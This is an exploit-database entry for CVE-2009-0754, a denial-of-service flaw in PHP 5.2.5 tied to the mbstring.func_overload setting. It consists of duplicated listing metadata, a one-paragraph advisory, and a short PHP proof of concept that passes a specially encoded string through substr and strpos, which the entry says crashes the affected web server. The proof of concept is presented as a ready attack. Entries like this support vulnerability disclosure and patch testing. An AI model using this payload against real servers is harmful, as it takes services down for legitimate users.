PHP 5.2.5 - 'mbstring.func_overload' WebServer Denial of Service
| EKU-ID: 37664 | CVE: CVE-2009-0754;OSVDB-53574 | OSVDB-ID: |
| Author: strategma | Published: 2009-01-30 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 37664 | CVE: CVE-2009-0754;OSVDB-53574 | OSVDB-ID: |
| Author: strategma | Published: 2009-01-30 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/33542/info
PHP is prone to a denial-of-service vulnerability because it fails to limit global scope for certain settings relating to Unicode text operations.
Attackers can exploit this issue to crash the affected webserver, denying service to legitimate users.
<?php
$v = 'Òîâà å òåñò|test.php';
print substr($v,0,strpos($v,'|'));
?>